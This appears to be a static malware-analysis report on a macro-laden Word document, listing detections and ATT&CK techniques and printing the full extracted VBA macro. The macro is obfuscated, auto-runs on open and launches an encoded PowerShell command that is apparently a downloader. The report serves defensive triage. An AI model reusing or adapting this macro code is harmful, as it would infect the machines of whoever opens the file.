MALICIOUS
310
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains VBA macros, including an AutoOpen macro, which is a common technique for initial execution. The macros utilize WScript.Shell and CreateObject to execute commands, specifically calling the Shell() function. This indicates the macro is designed to download and execute a second-stage payload, likely from a remote source, which is a critical step in a typical malware infection chain.
Heuristics 10
-
ClamAV: Doc.Malware.Generic-6665592-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6665592-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Error zcKHTA / wUTvF zahNnlPTrs = CreateObject("WScript.Shell") _ . _ -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Error zcKHTA / wUTvF zahNnlPTrs = CreateObject("WScript.Shell") _ . _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "YDODBhi" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9641 bytes |
SHA-256: 841bc64a264db19109233fa6cd3908094c82b4d8004b3207d8600dd40c316187 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
118 of 197 identifiers look randomly generated (e.g. 'ONwEpqlVirPFk'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "altLkCp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "OGJLBjkbhR"
Function uitbp()
On Error Resume Next
Error 43783 * FESoPk
Error 18317 * OUWzu * 42702 / JJKnF
Error 55501 * XGBkzP
Error 20114 / 23756
Error 91099 / MHLWOS
iWKuntzTA = "mD /V" + "^ ^ /" + "r" + Chr(4 + 0 + 1 + 1 + 28) + " ^s^e^" + "t ^ " + "^ Vv^2" + "^T=^=^" + "=^A" + "A^g^A^A" + "^I^" + "AAC" + "^A^gA^A"
Error hBKwq / jwKXQ
Error 31172 * zPPnQz
Error Hizpr * DktZac
QRoiWlwpN = "^" + "IAAC^" + "Ag" + "^AA^I" + "AACAg^A" + "^A^I" + "AAC" + "^AgAA" + "^I^AA" + "CA^g^"
Error 5776 / bUmLA * 60895 / 33070
Error PWSdY / Ynqoi
kSvBm = "AAI^" + "A^0H^A" + "^9Bwe" + "^A^" + "g" + "^GA^" + "j" + "BAd^AE^" + "G^" + "A^jBQ^" + "f" + "A^s^DA" + "r^B^Q"
Error HlcLU / YVjALS
HLKTZo = "Y^" + "AU^GA^" + "y^" + "B^g" + "YA^s" + "^DAC^" + "B^gQ" + "AEH^Ak^" + "A^AI" + "A0^" + "G^"
Error RGvlW * KRFoio
Error 33348 / iQIoiT
Error 11227 / JwdfQ * LzCiZ * UzTzt
Error nKbvq / fzSCI * VKToqp * cnRNNH
jitwXi = "Al^B^A" + "^d" + "A" + "kE^A^t" + "^AQ^Z^"
uitbp = iWKuntzTA + QRoiWlwpN + kSvBm + HLKTZo + jitwXi
Error HhSIVc * wolNpV * 56565 / lcGGE
Error GLUqj * hmsCD
Error 74234 * ntcib / wQztHO / VwNoIM
Error bjURL * iOvGJZ
End Function
Function EwSTBjT()
On Error Resume Next
Error WFXRU / HtYNs
Error 54414 * BFYCu
VzvjOh = "As^G" + "^" + "AvBg" + "^" + "dA^"
Error 75750 * RrRaq
HUEhh = "4^G^A" + "^J" + "B" + "^w^O" + "A^kC^" + "AC^" + "BgQ" + "A" + "^E"
Error 92221 / JbFBjm / 41368 / TpwDT
Error CtAlX / FajBFa * 6685 * 66930
MbINodwp = "H^A^" + "k^AA^I" + "AwC" + "^AR^Bwa" + "A^4^G^A" + "^k^AA^" + "K^AU^" + "G^" + "A^s^B^Q" + "aA^YEAk" + "^B" + "^Q^YA"
Error RvSBFA * lhpmt
Error wdOXw / uYLDA
Error 80613 / ThrBHw * 78855 / Ujwsj
Error 99136 / MSVCCD * 73584 / uBwti
XsbSV = "^" + "8^G" + "As^B" + "gb^A" + "cHAv^B^" + "AR^A" + "^4" + "C"
Error AsZPTj / nOaiMb * bujOk * iwVPd
Error 65783 / FtnfA / smaad / qEmhOc
Error FDJVf / 65109 / CWKmI / ViUmD
QDUMZA = "AQB^w" + "UAMG^A" + "^kA^w" + "^e^Ak" + "HAy" + "BAd^A" + "^sH^A" + "p" + "^AQWA^o" + "H^A^OB^"
Error 21024 * UIlzca
Error 77822 * AbRQB * 69388 * ASJqP
sllKGqWZv = "AJ^" + "A" + "^AC^AuB" + "Qa^" + "AAC^AR" + "B^wa" + "^A4^" + "GA" + "^"
Error iVWSv * PVGQj / jfFdq * IlhkEj
Error 37943 * tEUYE * 37236 * RHEtt
Error YFOBkh * YVqwPd
Error 97780 / phbIW / lrfiS * zZzoS
Error 71553 * LzSii / 40876 / fziHD
wqvCSwM = "k" + "A^" + "A^K" + "^" + "AgG^" + "AjB^Q^Y" + "^AU^G" + "AyBw" + "b^AY^G" + "A7A^w" + "^J^AUG^" + "A4B^Q" + "^ZA4C^A"
Error LRhOo * HnAQG / 31756 / CtoDM
Error 20803 / 52088 / 61627 * bqsQBi
Error wFKlWk / mzzbBU * PSTzIL * sjnfb
CzhNZsPjM = "n^" + "A^w^KAc" + "EA^6" + "B^A^TA" + "QC" + "^Ar^A" + "^w^JA" + "^w^" + "F" + "An^A"
Error 92264 / GFiaK / 20956 / QWESZa
Error iVBbaz / aGXDY / GviMq / 79898
Error TtPEW * 5375 / 50973 * ssRTn
zhtwQB = "w^K" + "^" + "AM^GA" + "pB" + "^A^b^A" + "IG^A1B" + "^Ac^"
Error zVMCf * DGmYJb * GilVdL / lWDudW
Error 60379 * FjFpYP * 40385 * orrqIS
Error wdmJjz * odTaS
hBpRMYKG = "A^o^DA^" + "2B^gbAU" + "^G^Ak" + "A^Q" + "PA"
Error NXUhp * lBrNI
Error 74198 * ldEFB / sbVGHZ / MFpCK
hJimdtQiK = "IE^AC^B" + "^Q" + "c^A^Q" + "C" + "^A^7Aw"
EwSTBjT = VzvjOh + HUEhh + MbINodwp + XsbSV + QDUMZA + sllKGqWZv + wqvCSwM + CzhNZsPjM + zhtwQB + hBpRMYKG + hJimdtQiK
Error 57597 / nlIoM
Error iYBCP / dAFcj / PqFhiV / wmwCP
Error wYQXUr * VMRvQm * 4271 / 27895
Error mZwCK / SEqTpT
Error RPjZh * BwUOTp * URrQZL / Cmjtla
End Function
Function kSzmsN()
On Error Resume Next
Error 19800 * jnoHsi
Error NRZoqR * nsccLh * KQWzjf * luLuz
bKHVzr = "JA^g^D" + "A" + "^2AwJA" + "^ACA" + "^9^A^AI" + "Ac" + "E^A" + "6^B^AT"
Error 77096 / pjYKU * vOHUM * Wfcwz
Error 55424 * ktBmZ / XOurAT * TmvnWi
Error HrMTG / 27859
EcKBpio = "^A^QCA^" + "7A^QKA" + "c" + "C^A" + "^A^Bw^" + "J^A^g" + "C^A0^" + "BQa^A^w" + "GA^w^" + "B" + "^w^UA^4" + "CAnA^QN" + "^A4G^"
Error 91755 / jpPow
Error 72619 / stjUQU / PDsjLa * jDdBp
Error 36879 / IfwpU
Error fqQBlm * onbsbq
XlahPzj = "ANB^wc" + "A^EG^A" + "vA" + "Q^b^A" + "^8^GAj^" + "Bg^LA^M" + "^HA^" + "0Bgc^A^" + "8" + "G^" + "A^" + "w" + "^B^wcA^"
Error 5422 / baGMLu / TRilAV / zNfXCP
Error 78394 / jOpaz
Error CldOOu / XUvZi
KBlTCCX = "4GAp^B^" + "Q^Y" + "^A^" + "I" + "H^A^" + "0^B^w^b" + "^A" + "c^G" + "^AvA^w^" + "L^A^oDA" + "wBAd" + "^A^Q^"
Error nRzsN / nUnam / WzVUt * pcAXHM
mzDKFiaQKI = "HA" + "^oB^A^Q" + "AUGAV^" + "B^w" + "N^A"
Error 16446 * GqaUL
Error YaEdRO / qnbnC
Error 98163 / jGifNQ
CKZBc = "8C" + "A^tB^" + "w^" + "b" + "AM^GAuA"
kSzmsN = bKHVzr + EcKBpio + XlahPzj + KBlTCCX + mzDKFiaQKI + CKZBc
Error YCjOwA / vzWwt
Error XNjhTk / miEfJ
Error jIKNnR * PiCtn * rCDCh / HHRdiq
End Function
Function YOBRtIDrqzn()
On Error Resume Next
Error 72410 / finfc * qLjGX / Iijoja
Error 70018 / CwSMiO / bWlvTv / UGHhcL
Error 36256 * 52064 / Nziwu / bvBoc
Error TuBLk / 23541
jZhPbjW = "^Q" + "bA^E" + "G^A^lB" + "^A^d^AI" + "^H" + "Av^B^Ad" + "^A^EGAl" + "BgcAM^G" + "^Ai^" + "B^Q^Z^A" + "c^"
Error 51919 / jMiZs
Error UVLVd / zLbJE
Error 47679 * 76694 / Xzwifi * MJARHW
Error 72329 / 76871 * 76351 / 52380
Error 14070 / Grmnw / 69598 * lizcA
PwwiJcAu = "HAu^A^" + "QZAAH^" + "Av" + "B^Aa" + "^A^8" + "CAvA" + "^" + "g^O^A"
Error lFWYjc / ILvjw
Error aCpHdY / ScGWE
kjJBCrjR = "AH^" + "A^0B^Ad" + "^AgGA^" + "ABQVA^" + "UF^A5BA" + "aA^AHA"
Error dilIP * daDTQ / MJQoih / lYTzk
blVlrlB = "^2B^w^L" + "A^s^G" + "^A^w" + "^B^g^L" + "A" + "kGA6" + "^Bgc^A" + "E^GA^k"
Error 34978 / QCcVXs
Error 23871 / pGbwcl / MdEJLR * XjJqJl
VuiMFIhWnLd = "BQ^Y^A4" + "^" + "G^AwBQ" + "YA" + "8C^A" + "v^A^g" + "^O"
Error iAKBru / TbDto * wowiJX / cIQwKF
Error CXatl / tvRkv / 34567 / khIYC
Error Utbcii * ZjLqm
sYOZomAJVwV = "A^A" + "^H^A0^B" + "Ad^A" + "gGA^A" + "BwY" + "A^Q" + "G^" + "A^p^" + "BQZAYG" + "^A^wBw" + "LA^0G" + "^Av^" + "B^wY"
YOBRtIDrqzn = jZhPbjW + PwwiJcAu + kjJBCrjR + blVlrlB + VuiMFIhWnLd + sYOZomAJVwV
Error HJAtIw / PGPULF
Error 17623 / vTdiY * 97883 * jbOdOY
Error 33436 * dzDED * 86636 / zNFUrb
End Function
Function MXkPtw()
On Error Resume Next
Error 64332 / EEvYY / iBISQR / SjqvAX
Error KfCiK * znBCA * pZKdlq / zkaKrw
Error bljdHQ / Hikzo
fpwiCvjpod = "A^4CAx" + "A^Q^MA^" + "gD^A" + "xA^g^e" + "^AI^GA" + "^h" + "Bw" + "cA" + "^4G" + "^A"
Error 28193 / iNHPQX / 8121 / ZNKJYn
Error 68347 / 40216
Error 90959 * 89109 * 3143 * LwFuYt
TXbXOuLZhqs = "^hB^" + "wc^" + "A^8^" + "G" + "AvBAd^" + "A8" + "C^AvA^" + "g^O" + "A" + "AH^" + "A^0B" + "Ad^A^g^" + "GAAB^QY"
Error 89768 / 61642
XSjKMjGtYc = "^A^" + "g^" + "FAz^" + "BQM" + "A^Q^FA" + "vA" + "Q^bA^" + "8^GAj^B" + "^gL" + "^A^E^G^" + "A^" + "u" + "B"
Error 53862 / SWTva
Error 21385 / 93619
Error Oozkfl / 68628
afHrS = "w^YA0" + "CA^t^B^" + "wLA" + "^8C" + "^A^6" + "^"
Error wZTHA * aTNndS / 65313 / UMQZk
Error 83194 * nJVKDi
rRYYjDM = "A" + "Ac^A^Q" + "H" + "A0" + "BAaAcCA" + "9A^" + "Q^W" + "A^o" + "^" + "H^A^" + "O^B^A"
Error 65142 * dIZtD
Error iMIlAn * 28553
msKLX = "^J" + "A" + "^sD^A^" + "0^Bg^bA" + "U" + "^G^A^" + "pBA" + "bAM^EA" + "iBQ^" + "Z" + "Ac^FA" + "u^" + "A"
Error 97261 / 643 * jhDYvl * 79037
tmawzRipl = "A^dA" + "U^" + "G" + "A^OBA^" + "IAQ^" + "H^A^j^"
Error 78679 / daJFi / EsAAJj / PwGaDD
Error 45408 * CvMfX * 25330 / pbajVI
Error zIkNqH / PbnFtG
aJiTjAImcdt = "BQ^Z^Ao" + "^G^Ai" + "B^w^b^A" + "0C^A" + "^3BQZA4" + "G^" + "A9^" + "AA^UA^M" + "^F^Aj" + "B" + "^AJ " + "^e^- ^"
Error zOrGKZ * ATGkHk / 7643 / QfwNww
Error 79501 / MEsNpz / aMowT / YTCRY
TrvPIzZj = "llehs" + "r^ew" + "o^p&^" + "F^Or /" + "^l" + " %" + "^" + "2 ^iN" + " (^" + " " + "94^1" + "^ ^-1 ^" + "0)^d^O "
Error 71857 / 93217
Error 47045 / WZBPTr
sSGtuRTXAd = "^s^" + "e^t " + " ^P^yd" + "=!^P^y" + "d!!Vv^" + "2^" + "T:~ %" + "^2, 1!" + "& " + " i^f" + " " + "%^"
Error TTnzj * zPuVoD
Error 8297 / vwihzF
Error lCQPP * FEriw * 64771 / WTKPw
fWzjGQsiZb = "2 " + "^L^E^Q " + " ^0 C" + "A^l^L " + " %^P^" + "yd:~^" + " ^ ^ ^" + "5" + "% " + " "
MXkPtw = fpwiCvjpod + TXbXOuLZhqs + XSjKMjGtYc + afHrS + rRYYjDM + msKLX + tmawzRipl + aJiTjAImcdt + TrvPIzZj + sSGtuRTXAd + fWzjGQsiZb
Error 58630 / 14568 * 80974 * 19893
Error unwcXO / OwwzXw
Error 78034 / UMwXfV / 784 * ttSPQ
End Function
Function ntWlaZqQlcn()
On Error Resume Next
Error 61467 * zDqPJZ / jjNUAR / mJvuuQ
Error GEwvV * 11918 * 94783 * nBrihL
Error 45912 * rOAnz / 480 * 20766
LaYZuqdFj = " " + " " + Chr(4 + 0 + 1 + 1 + 28) + " " + ""
ntWlaZqQlcn = LaYZuqdFj
Error jGaCL / wMwrw
Error 13866 * KEJiXU * tFOVSb * PKmjPi
Error wEsfJi * zLBoFQ / PocwlQ * Doisa
End Function
Attribute VB_Name = "YDODBhi"
Sub AutoOpen()
On Error Resume Next
Error oZddJ * wYNVr / Jkwwc * rwIzjr
Error zcKHTA / wUTvF
zahNnlPTrs = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(10 + 12 + 4 + 7 + 34) + jSdLmtAG + wrAAbOpQFqXA + uitbp + EwSTBjT + kSzmsN + YOBRtIDrqzn + MXkPtw + ntWlaZqQlcn + ONwEpqlVirPFk + UIdiPdp, 120775674 - 120775674)
Error dfLli / VIOYWz / EzKSq / jLzNj
Error 22900 / CTzch / MGOPR * sNlXY
Error 96996 / ktbCom / ulzYww / cvdNJ
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.